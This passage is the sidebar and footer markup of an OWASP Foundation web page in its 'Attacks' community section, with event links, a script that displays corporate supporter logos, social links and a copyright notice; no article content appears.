  <div class='owasp-sidebar-top'>
    <strong>The OWASP Foundation</strong> works to improve the security of software through its community-led open source software projects, 
     hundreds of chapters worldwide, tens of thousands of members, and by hosting local and global conferences.
</div>

  
  
  <h3 id="important-community-links">Important Community Links</h3>

<ul>
  <li><a href="/www-community">Community</a></li>
  <li>Attacks (You are here)</li>
  <li><a href="/www-community/vulnerabilities">Vulnerabilities</a></li>
  <li><a href="/www-community/controls">Controls</a></li>
</ul>

  
  
  

  <div class='owasp-sidebar-bottom'>
<h3>Upcoming Global Events</h3>
   <ul>
      <li><a href="https://dublin.globalappsec.org/?utm_source=owasp-web&utm_medium=right-col&utm_campaign=www-community" target="_blank">Global AppSec Dublin June 15-19th</a></li>
      <li><a href="https://sf.globalappsec.org/?utm_source=owasp-web&utm_medium=right-col&utm_campaign=www-community" target="_blank">Global AppSec SF October 19th-23rd</a></li>
   </ul>
</div>


  <!--<div>
    <h3>OWASP News & Opinions</h3>
    <ul>
    	
    </ul>	
  </div>-->
</div>

      </div>
    </main>
    <footer>
  <section class="member">


  <script type="text/javascript">
    var members = [];
    $(function() {
      
      corp_members = YAML.load('/assets/sitedata/corp_members.yml');
      $.each(corp_members, function (index) {
        members.push(this);
        });
        var randomIndexUsed = [];
        var counter = 0;
        var numberOfImages = 9;
        if(members.length > 0)
        {
          var htmlstring = "";
          while (counter < numberOfImages)
          {
              var randomIndex;
              var img;

              randomIndex = Math.floor(Math.random() * members.length);

              if (randomIndexUsed.indexOf(randomIndex) == "-1")
              {
                  counter++;
                  htmlstring += '<a href="'+ members[randomIndex]["url"] + '" class="member-logo" rel="sponsored" target="_blank" onclick="handleOutboundLinkClicks(event);"><img src="https://owasp.github.io' + members[randomIndex]["image"] + '" alt="image"/></a>';
                  
                  randomIndexUsed.push(randomIndex);
              }
          }

          $("#corp_member_div").html(htmlstring);
         
          var randi = Math.floor(Math.random() * members.length);
          htmlstring = '<h2>Spotlight: ' + members[randi]["name"] + '</h2>';
          htmlstring += '<a href="'+ members[randi]["url"] + '" rel="sponsored" target="_blank" onclick="handleOutboundLinkClicks(event);"><img src="https://owasp.github.io' + members[randi]["image"] + '" alt="image" /></a>';
          htmlstring += '<p>' + members[randi]["description"] + '</p>';
          $(".member-spotlight").html(htmlstring);
        }
    });
  </script>
  <div class="member-wrapper">
    <section class="member-spotlight">
    </section>
    <section class="member-list">
      <h2>Corporate Supporters</h2>
      <div id="corp_member_div">
      </div>
      <div class="member-cta">
        <a class="callout-link" href="/supporters">Become a corporate supporter</a>
      </div>
    </section>
  </div>
</section>

  <section class="footer-wrapper">
    <section class="social">
<a href="https://owasp-slack.herokuapp.com" target="_blank;"><i class="fa fa-lg fa-slack"></i></a>
<a href="https://www.facebook.com/OWASPFoundation" target="_blank;"><i class="fa fa-lg fa-facebook-square"></i></a>
<a href="https://twitter.com/owasp" target="_blank;"><i class="fa fa-lg fa-twitter"></i></a>
<a href="https://www.linkedin.com/company/owasp/" target="_blank;"><i class="fa fa-lg fa-linkedin"></i></a>
<a href="https://www.youtube.com/user/OWASPGLOBAL" target="_blank;"><i class="fa fa-lg fa-youtube-square"></i></a>
</section>
    <nav class="bot-nav" role="navigation" aria-label="secondary navigation">
      <ul>
        <li><a href="/">HOME</a></li>
        <li><a href="/projects/">PROJECTS</a></li>
        <li><a href="/chapters/">CHAPTERS</a></li>
        <li><a href="/events/">EVENTS</a></li>
        <li><a href="/about/">ABOUT</a></li>
        <li><a href="/www-policy/operational/privacy">PRIVACY</a></li>
        <li><a href="/sitemap/">SITEMAP</a></li>
        <li><a href="/contact/">CONTACT</a></li>
      </ul>
    </nav>
    <p class="disclaimer">
        Open Web Application Security Project, OWASP, Global AppSec, AppSec Days, AppSec California, SnowFROC, LASCON, and the OWASP logo are trademarks of the OWASP Foundation. Unless otherwise specified, all content on the site is Creative Commons Attribution-ShareAlike v4.0 and provided without warranty of service or accuracy. For more information, please refer to our <a href="/www-policy/operational/general-disclaimer.html">General Disclaimer</a>. Copyright 2020, OWASP Foundation, Inc.      
    </p>
  </section>
</footer>

  </body>
</html>


